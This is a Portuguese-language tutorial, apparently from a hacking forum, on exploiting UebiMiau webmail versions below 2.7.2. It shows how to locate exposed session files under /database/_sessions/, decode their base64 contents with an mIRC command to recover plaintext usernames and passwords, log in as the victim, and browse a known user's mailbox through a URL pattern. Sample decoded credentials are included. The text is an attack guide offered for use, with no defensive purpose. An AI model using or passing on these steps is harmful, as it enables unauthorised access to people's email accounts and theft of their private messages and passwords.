UebiMiau 2.7.2

Somente UebiMiau com versões menores que 2.7.2 estão vulneraveis.

Seguinte... essa vulnerabilidade da acesso a path onde fica os arquivos de seção guardados, são arquivos temporários. Nesses arquivos contem dados das contas, são arquivos que são destruà*dos apos o usuário sair, mas acredito que pelo motivo dos usuários não saà*rem no link SAIR e sim no X ou mudam de site, esses arquivos continuem gravados na path.
Apos você ter acesso a esses arquivos eles estarão criptografados, ai você terá que descriptografar, há fácil explicarei detalhes por detalhes.
Vira muitos sites do tipo. www.exemplo.com.br/webmail/
Segundo passo: Explorando os sites.
Apos a pesquisa você achara sites do tipo
www.exemplo.com.br/webmail/
acrescente /database/_sessions/ apos /webmail/
ficara assim. www.exemplo.com.br/webmail/database/_sessions/
Pronto se aparecer arquivos do tipo:
{435B5077BE08A-435B5077C2FF1-1130057847}.usf
O webmail esta vulnerabilidade, se caso não aparecer nada, (a pasta _sessions, vazia) há porque ninguhám cometeu aquele erro de não CLIKAR no SAIR pra destruir esse arquivo.
*Mas esta vulnerabilidade, porem sem nenhum arquivo.
Caso Aparecer Page Not Found... ou Sem autorização pra abrir a pasta, há porque não esta vulnerável.
TERCEIRO PASSO: Descriptografar.
Apos achar os arquivos *.usf abra-o e veras uma string do tipow:
YTo1OntzOjU6ImVtYWlsIjtzOjIwOiJkbWdpdGFqYWlAZG1nLm NvbS5iciI7czo
0OiJ1c2VyIjtzOjk6ImRtZ2l0YWphaSI7czo0OiJwYXNzIjtzO jY6Iml0YWphaSI
7czo2OiJzZXJ2ZXIiO3M6Nzoid2VibWFpbCI7czo1OiJzdGFyd CI7aToxMTI5OT
M5MjQ3O30=
Bom aqui ela esta criptografada, agora vamos descriptografa-la.
Usamos o mIRC para executar essa proeza.
no mIRC digite na linha de conversação.. (onde você usa pra conversar)
//echo -a $decode(StringCriptografada, -m) e tecle enter.
pronto o resultado vira na hora.
*OBS: Não esqueça do // antes do echo, e do ,-m no final.
*OBS: Não use strings muito grande pra descriptografar, pois o mirc ele limita caracteres... caso você colocar a string apos o $decode( e depois vc for acrescentar os ,-m) e cada tecla que pressionar você ouvir um BIP soar, há pq o limite foi atingido, então comece a deletar o final da st5ring criptografada.
BLZ.. apos aparecer o resultado. que eh algo como:
a:9:{s:5:"email";s:18:"richard@TESTE.COM.br";s:4:" user";s:7:"richard";
s:4:"pass";s:6:"999611";s:6:"server";s:4:"mail";s: 5:"start";i:1130057847;
s:4:"auth";b:1;s:7:"folders";a:5:{i:0;a:1:{s:4:"na me";s:5:"inbox";
}i:1;a:1:{s:4:"name";s:5:"trash";}i:2;a:1:{s:4:"na me";s:4:"sent";}i:3;
a:1:{s:4:"name";s:8:"silvania";}i:4;
você vai ter os seguintes dados necessários para login:
USER: richard
SENHA: 999611
Agora há só voltar para a tela de login e se logar.
Pronto.. você teve sucesso.
Caso você saiba o LOGIN de algum usuário use
http://www.exemplo.com/database/user_domain/
Onde "user" há o usuário alvo e "domain" há o domà*nio alvo.
Ai você entrara no "esqueleto" da conta do usuário, tendo acesso aos e-mails e tudo mais.

By Dominiac